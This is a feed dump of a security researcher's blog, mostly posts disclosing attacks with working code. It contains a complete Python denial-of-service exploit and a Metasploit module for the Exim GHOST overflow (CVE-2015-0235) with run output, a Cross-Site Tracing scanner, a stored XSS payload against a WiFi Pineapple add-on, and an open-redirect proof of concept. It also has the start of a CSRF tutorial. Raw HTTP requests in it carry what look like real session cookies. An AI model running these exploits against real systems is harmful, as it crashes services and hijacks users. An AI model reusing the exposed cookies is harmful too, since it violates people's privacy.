tag:blogger.com,1999:blog-33525376400114303932024-02-07T19:23:16.140-08:00Treadstone Securityhttp://treadstonesecurity.blogspot.comUnknownnoreply@blogger.comBlogger33125tag:blogger.com,1999:blog-3352537640011430393.post-64709589265301032142015-11-12T04:22:00.001-08:002015-11-12T04:22:55.215-08:00InjectX to Find XSS<iframe allowfullscreen="" frameborder="0" height="270" src="https://www.youtube.com/embed/NdGGCNjQB2A" width="480"></iframe>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3352537640011430393.post-3759095348709229572015-06-06T16:59:00.000-07:002015-07-08T16:47:20.911-07:00Automatically Brute Force All Services On A Remote Host<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKLiOk-TIUXcGL7TDvKtK2P2CkQOxS0nUB_0hh-k5DSRNnD9n0mvtYYUwMjUtEhWXqFAZzmY7Sp_O9u-lUyxKPJABCRDVmXmgm4ZAg7BERuQBrO-o2ywbszFuYKcyJyUP46wnM1H4ZinwF/s1600/BruteX-by-1N3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKLiOk-TIUXcGL7TDvKtK2P2CkQOxS0nUB_0hh-k5DSRNnD9n0mvtYYUwMjUtEhWXqFAZzmY7Sp_O9u-lUyxKPJABCRDVmXmgm4ZAg7BERuQBrO-o2ywbszFuYKcyJyUP46wnM1H4ZinwF/s640/BruteX-by-1N3.png" width="484" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<a href="https://github.com/1N3/BruteX" style="background-color: white;" target="_blank">https://github.com/1N3/BruteX</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3352537640011430393.post-78109503285021566262015-02-28T03:05:00.001-08:002015-02-28T03:05:33.985-08:00Cross-Site Tracer Exploit<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4f0zC1JyTPJ2Z8hw0stkV-l3ShAH8HkpvhfgcGndgRzzlO7eQmiv8nocupCfRnOZSp_iT84utbND4be9m_mqjVa2pko20JOjOnt5Pr2haFg81n-zxACbb_6Q5U7HLF6AfbKq2WtSe2quB/s1600/xsstracer.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4f0zC1JyTPJ2Z8hw0stkV-l3ShAH8HkpvhfgcGndgRzzlO7eQmiv8nocupCfRnOZSp_iT84utbND4be9m_mqjVa2pko20JOjOnt5Pr2haFg81n-zxACbb_6Q5U7HLF6AfbKq2WtSe2quB/s1600/xsstracer.png" height="222" width="400" /></a></div>
<br />
#!/usr/bin/python<br /># Cross-Site Tracer by 1N3 v20150224<br /># https://crowdshield.com<br />#<br /># ABOUT: A quick and easy script to check remote web servers for Cross-Site Tracing. For more robust mass scanning, you can create a list of domains or IP addresses to iterate through by doing 'for a in `cat targets.txt`; do ./xsstracer.py $a 80; done;'<br />#<br /># USAGE: xsstracer.py <IP/host> <port><br />#<br /><br />import socket<br />import time<br />import sys, getopt<br /><br />class bcolors:<br /> HEADER = '\033[95m'<br /> OKBLUE = '\033[94m'<br /> OKGREEN = '\033[92m'<br /> WARNING = '\033[93m'<br /> FAIL = '\033[91m'<br /> ENDC = '\033[0m'<br /> BOLD = '\033[1m'<br /> UNDERLINE = '\033[4m'<br /><br />def main(argv):<br /> argc = len(argv)<br /><br /> if argc <= 2:<br /> print bcolors.OKBLUE + "+ -- --=[Cross-Site Tracer by 1N3 v20150224" + bcolors.ENDC<br /> print bcolors.OKBLUE + "+ -- --=[" + bcolors.UNDERLINE + "https://crowdshield.com" + bcolors.ENDC<br /> print bcolors.OKBLUE + "+ -- --=[usage: %s <host> <port>" % (argv[0]) + bcolors.ENDC<br /> sys.exit(0)<br /><br /> target = argv[1] # SET TARGET<br /> port = argv[2] # SET PORT<br /><br /> buffer1 = "TRACE / HTTP/1.1"<br /> buffer2 = "Test: <script>alert(1);</script>"<br /> buffer3 = "Host: " + target<br /><br /> print ""<br /> print bcolors.OKBLUE + "+ -- --=[Cross-Site Tracer by 1N3 "<br /> print bcolors.OKBLUE + "+ -- --=[https://crowdshield.com"<br /> print bcolors.OKBLUE + "+ -- --=[Target: " + target + ":" + port <br /><br /> s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br /> result=s.connect_ex((target,int(port)))<br /><br /> if result == 0:<br /> s.send(buffer1 + "\n")<br /> s.send(buffer2 + "\n")<br /> s.send(buffer3 + "\n\n")<br /> data = s.recv(1024)<br /> script = "alert"<br /> if script.lower() in data.lower():<br /> print bcolors.FAIL + "+ -- --=[Site vulnerable to XST!" + bcolors.ENDC<br /> print ""<br /> print bcolors.WARNING + data + bcolors.ENDC<br /> else:<br /> print bcolors.OKGREEN + "+ -- --=[Site not vulnerable to XST!"<br /> print ""<br /> print ""<br /><br /> else:<br /> print bcolors.WARNING + "+ -- --=[Port is closed!" + bcolors.ENDC<br /><br /> s.close()<br /><br />main(sys.argv)Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3352537640011430393.post-43875655847053925252015-01-29T14:58:00.000-08:002015-01-29T14:58:56.825-08:00Exim ESMTP glibc gethostbyname() Buffer Overflow CVE-2015-0235<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLpKKikKGODS9Vz-vWYVdj_8viN1lTpQJTIEK2okwGRk78Yic8rbf5Vt-fNwDYnFD4HsVceJOHwXJWUsRA054XhDm7ieRdIb0JEIQReFnvnFW2-BOMvQgyvXSPl-EO82Dws8XRDUpt2OXK/s1600/metasploit-logo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLpKKikKGODS9Vz-vWYVdj_8viN1lTpQJTIEK2okwGRk78Yic8rbf5Vt-fNwDYnFD4HsVceJOHwXJWUsRA054XhDm7ieRdIb0JEIQReFnvnFW2-BOMvQgyvXSPl-EO82Dws8XRDUpt2OXK/s1600/metasploit-logo.png" height="262" width="400" /></a></div>
<br />
<br />
msf auxiliary(ghost-exim-smtp-dos) > run<br /><br />[*] 192.168.1.132:25 - Server: ESMTP Exim 4.20<br />[*] 192.168.1.132:25 - HELO: ESMTP Exim 4.20<br />[-] Auxiliary failed: EOFError EOFError<br />[-] Call stack:<br />[-] /usr/share/metasploit-framework/lib/rex/io/stream.rb:203:in `get_once'<br />[-] /usr/share/metasploit-framework/lib/msf/core/exploit/smtp.rb:68:in `raw_send_recv'<br />[-] /usr/share/metasploit-framework/modules/exploits/linux/smtp/ghost-exim-smtp-dos.rb:44:in `run'<br />[*] Auxiliary module execution completed<br />msf auxiliary(ghost-exim-smtp-dos) > <br />
<br />
<br />##<br /># This file is part of the Metasploit Framework and may be subject to <br /># redistribution and commercial restrictions. Please see the Metasploit<br /># Framework web site for more information on licensing and terms of use.<br /># http://metasploit.com/framework/<br />##<br /><br /><br />require 'msf/core'<br /><br /><br />class Metasploit3 < Msf::Auxiliary<br /><br /> include Msf::Exploit::Remote::Smtp<br /> include Msf::Auxiliary::Dos<br /><br /> def initialize<br /> super(<br /> 'Name' => 'Exim ESMTP glibc gethostbyname() Buffer Overflow CVE-2015-0235',<br /> 'Description' => %q{<br /> This module exploits a buffer overflow in Exim SMTP servers version 4.20 or less resulting in a service crash on vulnerable systems.<br /> },<br /> 'Author' => [ '1N3' ],<br /> 'License' => MSF_LICENSE,<br /> 'Version' => '$Revision: 1 $'<br /> )<br /> end<br /><br /> def run()<br /> connect<br /> print_status("#{rhost}:#{rport} - Server: #{self.banner.to_s.strip}")<br /><br /> if not datastore['SkipVersionCheck'] and self.banner.to_s !~ /Exim /<br /> disconnect<br /> fail_with(Failure::NoTarget, "#{rhost}:#{rport} - The target server is not running Exim!")<br /> end<br /><br /> buffer = "0" * 1023<br /> helo_resp = raw_send_recv("HELO " + buffer + "\r\n")<br /> helo_resp.each_line do |line|<br /> print_status("#{rhost}:#{rport} - HELO: #{line.strip}")<br /> end<br /><br /> ehlo_resp = raw_send_recv("EHLO " + buffer + "\r\n")<br /> ehlo_resp.each_line do |line|<br /> print_status("#{rhost}:#{rport} - EHLO: #{line.strip}")<br /> end<br /><br /> print_status("Exploit sent!")<br /> disconnect()<br /> end<br />endUnknownnoreply@blogger.com0tag:blogger.com,1999:blog-3352537640011430393.post-28221798991158304372015-01-28T08:09:00.002-08:002015-01-31T05:58:03.167-08:00Exim ESMTP GHOST DoS Exploit<div class="separator" style="clear: both; text-align: center;">
<a href="http://cdn.grahamcluley.com/wp-content/uploads/2015/01/ghost-170.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://cdn.grahamcluley.com/wp-content/uploads/2015/01/ghost-170.jpeg" /></a></div>
<br />
#!/usr/bin/python<br />
# Exim ESMTP DoS Exploit by 1N3 v20150128<br />
# CVE-2015-0235 GHOST glibc gethostbyname buffer overflow<br />
# http://crowdshield.com<br />
#<br />
# USAGE: python ghost-smtp-dos.py <ip> <port><br />
#<br />
# Escape character is '^]'.<br />
# 220 debian-7-7-64b ESMTP Exim 4.80 ...<br />
# HELO <br />
# 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000<br />
# Connection closed by foreign host.<br />
#<br />
# user () debian-7-7-64b:~$ dmesg<br />
# ...<br />
# [ 1715.842547] exim4[2562]: segfault at 7fabf1f0ecb8 ip 00007fabef31bd04 sp 00007fffb427d5b0 error 6 in <br />
# libc-2.13.so[7fabef2a2000+182000]<br />
<br />
import socket<br />
import time<br />
import sys, getopt<br />
<br />
def main(argv):<br />
argc = len(argv)<br />
<br />
if argc <= 1:<br />
print "usage: %s <host>" % (argv[0])<br />
sys.exit(0)<br />
<br />
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br />
buffer = "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"<br />
<br />
target = argv[1] # SET TARGET<br />
port = argv[2] # SET PORT<br />
<br />
print "(--==== Exim ESMTP DoS Exploit by 1N3 - https://crowdshield.com"<br />
print "(--==== Sending GHOST SMTP DoS to " + target + ":" + port + " with length:" +str(len(buffer))<br />
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br />
connect=s.connect((target,int(port)))<br />
data = s.recv(1024)<br />
print "CONNECTION: " +data<br />
s.send('HELO ' + buffer + '\r\n')<br />
data = s.recv(1024)<br />
print "received: " +data<br />
s.send('EHLO ' + buffer + '\r\n')<br />
data = s.recv(1024)<br />
print "received: " +data<br />
s.close()<br />
<br />
main(sys.argv)Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3352537640011430393.post-36408368448515817172015-01-19T11:19:00.001-08:002015-01-19T11:21:12.039-08:00Hak5 Wifi Pineapple RCE PoC By 1N3<iframe allowfullscreen="" frameborder="0" height="270" src="https://www.youtube.com/embed/I_i2RhfB-Z8" width="480"></iframe>
<br />
<a href="https://crowdshield.com/">https://crowdshield.com</a> - PineappleV by Hak5 has a remote code execution flaw in the "Log View" infusion that allows un-intended code execution. Even though this is not really a "vulnerability" as only authenticated users have access to the device, it is more of a proof of concept showing un-intended code execution in the log viewer functionality due to a failure to validate and sanitize input.Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3352537640011430393.post-79622620136391659282015-01-19T11:09:00.001-08:002015-01-19T11:16:38.874-08:00Hak5 PineAP + Burpsuite + Tcpdump + Dnsspoof Tutorial by 1N3<iframe allowfullscreen="" frameborder="0" height="270" src="https://www.youtube.com/embed/zNLW3CbJ3XE" width="480"></iframe>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3352537640011430393.post-20019325685122598792015-01-15T07:40:00.001-08:002015-01-19T11:15:00.486-08:00Pwn Any Windows PC In 5 Seconds With BadUSB | CrowdShield #bugbounty<iframe allowfullscreen="" frameborder="0" height="270" src="https://www.youtube.com/embed/XgrLZ6lwIeY" width="480"></iframe>
<a href="https://crowdshield.com/blog/2015/pwn-any-windows-pc-in-5-seconds-with-badusb.php#.VLffa-y3DLM.blogger">Pwn Any Windows PC In 5 Seconds With BadUSB | CrowdShield #bugbounty</a><br />
<br />
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3352537640011430393.post-78766200704446466562015-01-15T02:22:00.001-08:002015-01-19T11:13:01.199-08:00Why Every Company Needs A Bug Bounty Program | CrowdShield #bugbounty<a href="https://crowdshield.com/blog/2015/why-every-company-needs-a-bug-bounty-program.php#.VLeU8DjJgZI.blogger">Why Every Company Needs A Bug Bounty Program | CrowdShield #bugbounty</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3352537640011430393.post-63975125459504099262014-12-30T16:56:00.003-08:002014-12-31T05:33:18.025-08:00WiFi Pineapple MK5 / SSLSplit v1.1 Cross-Site Scripting (Stored)Vendor: Hak5<br />
Website: http://www.hak5.com<br />
Hardware: Wifi Pineapple MK5<br />
Software: SSLSplit<br />
Version: 1.1<br />
Author: 1N3<br />
<br />
I'm releasing this info purely for educational purposes. There appears to be a stored Cross-Site Scripting vulnerability in the SSLSplit v.1.1 infusion for the Pineapple MK5. This could be used by a rogue wifi user to invoke a Cross-Site Scripting vulnerability on the owner of the Pineapple wifi device when viewing the SSLSplit logs.<br />
<br />
Reproduction Steps:<br />
1. Attacker sets up a RogueAP using PineappleV with SSLSplit running<br />
2. A Wifi user connects to the PinappleV RogueAP setup<br />
3. Wifi user then creates an image on his webserver with meta tags embedded with the following string: "></script>">'><img src=x onerror=confirm(4)><br />
4. Wifi user opens a web browser and navigates to the affected image they just created<br />
5. Attacker then tries to download his logs via the SSLSplit web UI (SSLSplit > History > Click "Download" for the affected log file)<br />
<br />
Result:<br />
Alert window message is displayed to attacker<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilv2IAMwR69pPb7joVxNset5dPVCXfbFI-Z5DIyaJibz2NfymGL5gvwkeyMIbqDyYTTHaYaXfl_sRjtlatH_1x7xs5SdfF-gpUWIYjDrPcqhHcFPDlPZm4QSXJc-Th1wkKc2SRdengYZub/s1600/sslsplit_xss1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilv2IAMwR69pPb7joVxNset5dPVCXfbFI-Z5DIyaJibz2NfymGL5gvwkeyMIbqDyYTTHaYaXfl_sRjtlatH_1x7xs5SdfF-gpUWIYjDrPcqhHcFPDlPZm4QSXJc-Th1wkKc2SRdengYZub/s1600/sslsplit_xss1.png" height="150" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiw9-7zk20mQuEIPz2zK7JViJfzBpkAz3-xzYsUTjL7rxMa5z8JAk0-ku8cgrts19eNaDjwaZoJQZj5zecJGjckg-k5lnFrUDggoHRWuY0mDGGeJz13QlfD01ZLEN4TOPVk7UZqe3pl66Su/s1600/sslsplit_xss2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiw9-7zk20mQuEIPz2zK7JViJfzBpkAz3-xzYsUTjL7rxMa5z8JAk0-ku8cgrts19eNaDjwaZoJQZj5zecJGjckg-k5lnFrUDggoHRWuY0mDGGeJz13QlfD01ZLEN4TOPVk7UZqe3pl66Su/s1600/sslsplit_xss2.png" height="158" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi42HYjj54fiwwnfhlr9wt_h6eIzY_LbSlaY5Q4NLyTrnuU0TnYE4Y0ohZm2WuAGAiOAALOSqimbYXjdJqBrKkvCwFJ8FMJwOqzQom9jUaK21vJGrYvfMiQtvwXmPFhrSbM3l5PM_CF_sKp/s1600/sslsplit_xss3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi42HYjj54fiwwnfhlr9wt_h6eIzY_LbSlaY5Q4NLyTrnuU0TnYE4Y0ohZm2WuAGAiOAALOSqimbYXjdJqBrKkvCwFJ8FMJwOqzQom9jUaK21vJGrYvfMiQtvwXmPFhrSbM3l5PM_CF_sKp/s1600/sslsplit_xss3.png" height="217" width="400" /></a></div>
<br />Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3352537640011430393.post-78668928108087519242014-12-05T12:42:00.001-08:002014-12-05T12:42:26.188-08:00MS14-068 Privilege Escalation PoC: Become Domain Administrator with Any User Account<a href="https://twitter.com/bidord" target="_blank">https://twitter.com/bidord</a><br />
<br />
<a href="http://www.reddit.com/r/netsec/comments/2ocf9s/pykek_ms14068_privilege_escalation_poc_become/" target="_blank">http://www.reddit.com/r/netsec/comments/2ocf9s/pykek_ms14068_privilege_escalation_poc_become/</a><br />
<br />
<a href="https://github.com/bidord/pykek" target="_blank">https://github.com/bidord/pykek</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3352537640011430393.post-10394776674276755072014-12-03T17:26:00.000-08:002014-12-31T05:34:21.439-08:00CrowdShield Bug Bounty Disclosure Programs | #bugbounty<h2>
<span style="font-size: x-large;"><span style="font-family: "Trebuchet MS",sans-serif;">Leverage the crowd! </span></span></h2>
<h3>
<span style="font-size: x-large;"><span style="font-family: "Trebuchet MS",sans-serif;">Improve your cyber security! </span></span></h3>
<span style="font-family: "Trebuchet MS",sans-serif;">Our <b>CrowdShield </b>framework connects you to security experts globally to keep you one step ahead of malicious hackers. <b>CrowdShield </b>allows you to test your technology around the clock to measure and prioritize real world threats to your cyber security. </span><br />
<br />
<span style="font-family: "Trebuchet MS",sans-serif;">Our
community of researchers, also known as the crowd, is comprised of
ethical hackers from around the world who responsibly disclose security
bugs in our bounty programs. </span><br />
<br />
<span style="font-family: "Trebuchet MS",sans-serif;">Cost effective and faster than standard security programs, <b>CrowdShield </b>provides
the framework to easily manage your bounty program and rewards the
crowd for their contributions. It's a win for everyone. </span><br />
<br />
<span style="font-family: "Trebuchet MS",sans-serif;">Open an account to start creating your customized bounty program. Using the <b>CrowdShield </b>platform,
you will be able to choose the scope and reward for your bounty.
Researchers send submissions to your bounty program. You review and
validate submissions to determine if the researcher should be rewarded.
Use information from the crowd to patch bugs and make your technology
safer than ever before, protecting sensitive data and your reputation.</span><br />
<br />
<span style="font-family: "Trebuchet MS",sans-serif;">Start your bug bounty program in seconds and start receiving feedback from ethical hackers around the world! </span><br />
<br />
<span style="font-family: "Trebuchet MS",sans-serif;"><a href="http://crowdshield.com/signup.php" target="_blank">http://crowdshield.com/signup.php </a></span><br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkRhFq0Jf_uQDkyBhYR_unsDclZZ45x8k4KgZngINXfzhlWFhEd68xCfYBEcnrHcGgFAAaccENSZ84RrCtL1zKGdsuceZVvo88IyojgTB1h0mA8vU1BLEZi4Onx0ykRlCWXa4SSjsMRV61/s1600/crowdshield_bug_bounty_program_list.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkRhFq0Jf_uQDkyBhYR_unsDclZZ45x8k4KgZngINXfzhlWFhEd68xCfYBEcnrHcGgFAAaccENSZ84RrCtL1zKGdsuceZVvo88IyojgTB1h0mA8vU1BLEZi4Onx0ykRlCWXa4SSjsMRV61/s1600/crowdshield_bug_bounty_program_list.jpg" height="640" width="404" /></a></div>
<br />Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3352537640011430393.post-35994043287243691982014-11-28T03:37:00.000-08:002014-11-28T03:38:09.160-08:00Google Captcha Open Redirect<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkweTkVzqnS_DII3YVKwp8FAAHxuGwA-uf5kmsPKhvspSK4nzh9H07u90cpG7upna83ZNlX1uluPWODGelGe2_wdscOcn48lHlnEIyUyZTAEOpHwdBLJgAxAxO_ySxLx3nemCZxOzeJaTd/s1600/open_redirect2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkweTkVzqnS_DII3YVKwp8FAAHxuGwA-uf5kmsPKhvspSK4nzh9H07u90cpG7upna83ZNlX1uluPWODGelGe2_wdscOcn48lHlnEIyUyZTAEOpHwdBLJgAxAxO_ySxLx3nemCZxOzeJaTd/s1600/open_redirect2.png" height="327" width="400" /></a><br />
<br />
Google's captcha page suffers from an open redirect vulnerability because it fails to verify that the "continue" parameter in the URI is actually a Google domain or even the referring domain. After checking Google's bug bounty however, they state:<br />
<br />
"<b>URL redirection.</b> We recognize that the address bar is the only reliable
security indicator in modern browsers; consequently, we hold that the usability and
security benefits of a small number of well-designed and closely monitored redirectors
outweigh their true risks".<br />
<br />
So, I'm publicly disclosing this as a POC for research/educational purposes...<br />
<br />
Affected URL:<br />
<a href="https://ipv4.google.com/sorry/CaptchaRedirect?continue=http%3A%2F%2Fwww.xerosecurity.com/search">https://ipv4.google.com/sorry/CaptchaRedirect?continue=http%3A%2F%2Fwww.xerosecurity.com/search </a><br />
<br />
GET /sorry/CaptchaRedirect?continue=<span style="color: red;">http%3A%2F%2Fwww.xerosecurity.com%2Fsearch</span>&id=14323360019737732799&captcha=phaures&submit=Submit HTTP/1.1
<br />
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.2.0
<br />
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
<br />
Accept-Language: en-US,en;q=0.5
<br />
Referer: https://ipv4.google.com/sorry/CaptchaRedirect?continue=http%3A%2F%2Fwww.xerosecurity.com/search
<br />
Cookie: NID=67=IJICmq9eG5l0yY71_TfQozLw8DqSRnymUmwzff1ftXnOJUKR1DmQ6oNiVUHutjOq8gSK-U5pHi96fgeEcjj7PX_tzBD5A_mOXE5wgZFddOC1p7gpn6gh7OfKbY8yASBSdChbMBpd2599HQqixF_yQZJJ3YGLPE0ojZGWkkX-ArdVUC_-pN9koTIoKx9eE0YY8SXE6GjnCnhvQYfEQuDW-Uxe; SID=DQAAAOkAAABhw0WvrjkT8xQH6c2XgaLv0p-tL5jZLgztm7PS4qjUKRW5A82hfRjqWIfUtygXtsOMVn79HsfuJlvygQihmq_jLIiKcVBSD6sP_j1zjQ70SJXlu_CwJS8BbCB6qte5owth0Woh9QYpQwlb3oGiIO14jzMO3J2bB3igtHuM9zw_FeeuV-45KLypZVSQ3vRgi1ql3CwCaGwdDOWsKX6sXYupSTWuwJGXlDoUbRelbGbNbj5lFk8zjH7i_OpSHtoObNSxcez8XKDdGGCXBunuxjmR5AJFPfOZAtuxUyNvepJNdtl85w9dp2rBmNK0vdy36Bg; HSID=An9s7nZT7S1d_V9NH; SSID=A5E1or_MNlR1bvfU0; APISID=NYY4lJPJNBtsj_OP/A93qTAJ9-5f1twNHn; SAPISID=yMRvPFxee5Yw48l7/A7k5Ks0Cjoi06jpEW; PREF=ID=062dffbad71fd850:U=741c8f032b07f996:FF=0:LD=en:TM=1415471152:LM=1415472410:GM=1:S=SJROGFDVcQgxz3Bj; GOOGLE_ABUSE_EXEMPTION=ID=b1036b53551499da:TM=1417137339:C=c:IP=37.221.161.234-:S=APGng0sgdi6BVBm7QOwlNSTnlE3Uvcupow
<br />
Connection: keep-alive
<br />
Host: ipv4.google.com
<br />
<br />
GET /search?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3Db1036b53551499da:TM%3D1417137339:C%3Dc:IP%3D37.221.161.234-:S%3DAPGng0v_nA-tCWgqXfxnch6lFhMcnFuAeg%3B+path%3D/%3B+domain%3Dgoogle.com%3B+expires%3DFri,+28-Nov-2014+04:15:39+GMT HTTP/1.1
<br />
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.2.0
<br />
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
<br />
Accept-Language: en-US,en;q=0.5
<br />
Cookie: __unam=7639673-1499c44efc6-201377d0-26; _ga=GA1.2.1993885406.1416758620; PHPSESSID=kph66vkf5on6879ivj7paml4o4
<br />
Connection: keep-alive
<br />
<span style="color: red;">Host: www.xerosecurity.com
</span><br />
Proxy-Connection: Keep-Alive
<br />
<br />
HTTP/1.1 200 OK
<br />
Date: Fri, 28 Nov 2014 01:08:32 GMT
<br />
Server: Apache/2.2.22 (Debian)
<br />
Last-Modified: Fri, 28 Nov 2014 00:39:03 GMT
<br />
ETag: "e40dbf-47-508e07cd2d95b"
<br />
Accept-Ranges: bytes
<br />
Content-Length: 71
<br />
Keep-Alive: timeout=5, max=100
<br />
Connection: Keep-Alive
<br />
<br />
<html><br />
<head></head><br />
<body><br />
<span style="color: red;"><script>alert(1);</script></span><br />
</body><br />
</html><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhUPNUW80yjmBWFpOC9XXEzX9KzwDyOVkPR6Y6byuSaD6pqcc6DKV8mLSbKsBfhmM69iw8VMBCYdF2uIhrps8JRVH-LvMs1YMECljCPoAx1GGoRAFwkT0dcq6MkFroDIeZ5uvsibtujByh/s1600/Screenshot+from+2014-11-27+20:14:00.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhUPNUW80yjmBWFpOC9XXEzX9KzwDyOVkPR6Y6byuSaD6pqcc6DKV8mLSbKsBfhmM69iw8VMBCYdF2uIhrps8JRVH-LvMs1YMECljCPoAx1GGoRAFwkT0dcq6MkFroDIeZ5uvsibtujByh/s1600/Screenshot+from+2014-11-27+20:14:00.png" height="215" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3352537640011430393.post-74423831038875623842014-10-25T05:37:00.000-07:002014-10-25T05:48:25.372-07:00Update Users Password and Email Address Using CSRF<div class="col col-md-9">
During a recent bug bounty/pentest, I discovered a <b>Cross Site Request Forgery</b> vulnerability that allowed me to automatically update a users email address, password, credit card info, shipping address and more. This is a brief tutorial on how it was done.<br />
<br />
<b>What is Cross Site Request Forgery?</b><br />
In short, cross site request forgery allows an attacker to do certain actions on behalf of valid users (such as updating a user's password).<br />
<br />
<b>Step 1:</b> Find a form on the target website that you want to test. In the example below, it was /AccountSettings.asp.<br />
<br />
<b>Step 2: </b>Intercept the POST request using Burpsuite or any other proxy. Notice below the POST values being submitted include the users password, email, CC data, etc. <br />
<br />
POST /AccountSettings.asp HTTP/1.1
<br />
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140924 Firefox/24.0 Iceweasel/24.8.1
<br />
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
<br />
Accept-Language: en-US,en;q=0.5
<br />
Referer: www.vulnerabletocsrf.com/AccountSettings.asp?modwhat=change_a
<br />
Cookie: vsettings=; ASPSESSIONIDCACRBAAC=AOJMIBNBPHKJKPDJBHMNMGHH;
ASP.NET_SessionId=sdrlj3454lpqi4zacpnkami3; __atuvc=6%7C42;
CartID5=64D7287A97204E7C821621BE7A6174C4;
Referrer=www%2Exerosecurity%2Ecom; AffiliateID=; AffiliateTrackedToday=;
ASPSESSIONIDCCCQCCDB=CDCPFKHCDEOJKEPKDMIFDPPM;
slt=ABEC051D-1B66-494C-BD3F-54D38B3A49AD;
CustomerID=2380CC3CAA66AF2AC5C9EA2ABEC9B68BE51956AFBCC2F1A26E858B323D260F9E
<br />
Connection: keep-alive
<br />
